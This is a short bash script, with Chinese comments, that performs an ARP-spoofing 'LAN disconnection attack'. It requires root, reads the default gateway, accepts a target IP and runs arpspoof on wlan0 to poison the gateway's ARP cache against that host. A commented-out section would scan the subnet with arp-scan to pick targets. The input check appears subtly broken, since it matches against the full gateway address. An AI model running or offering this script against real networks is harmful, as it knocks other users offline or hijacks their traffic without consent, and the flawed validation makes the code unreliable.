#!/bin/bash
# 局域网断网攻击
# Author: Claudio <3261958605@qq.com>
# Created: 2017-04-13 19:41:26
# Reference: http://www.freebuf.com/articles/network/74700.html
# Commentary:
# TODO：自动获取路由器上所有IP，选择攻击
# Code:

# 确保为root用户
if (( ! UID == 0 )); then
    echo "需root用户执行此脚本." >& 2
    exit 1
fi

# 确保上网（至少是局域网）
if ! /home/claudio/bin/claudio_connected_to_internet_p; then
    echo "至少要连接上局域网." >& 2
    exit 1
fi

# 获取局域网网关
GATEWAY=$(ip r | grep default | cut -d ' ' -f 3)
echo "Gateway: $GATEWAY"
# echo $GATEWAY                   # TEST

# 获取攻击目标的局域网IP
target_ip=                    # 目标IP

# 自动获取
# echo ${GATEWAY%.*}              # TEST
# VALID_IPS=$(arp-scan ${GATEWAY%.*}.0/24 | grep -E '^([[:digit:]]{3}.){2}' | cut -f 1,3 )
# echo $VALID_IPS                 # TEST

# echo "\$1：$1"                  # TEST
if [[ -z "$target_ip" && -n "$1" && $1 =~ ^$GATEWAY[0-9]{1,3}$ ]]; then
    target_ip=$1
else
    echo '请输入格式正确的目标IP.' >&2
    exit 1
fi

echo -e  "开始劫持...\n\n"
arpspoof -i wlan0 -t $GATEWAY $target_ip

exit
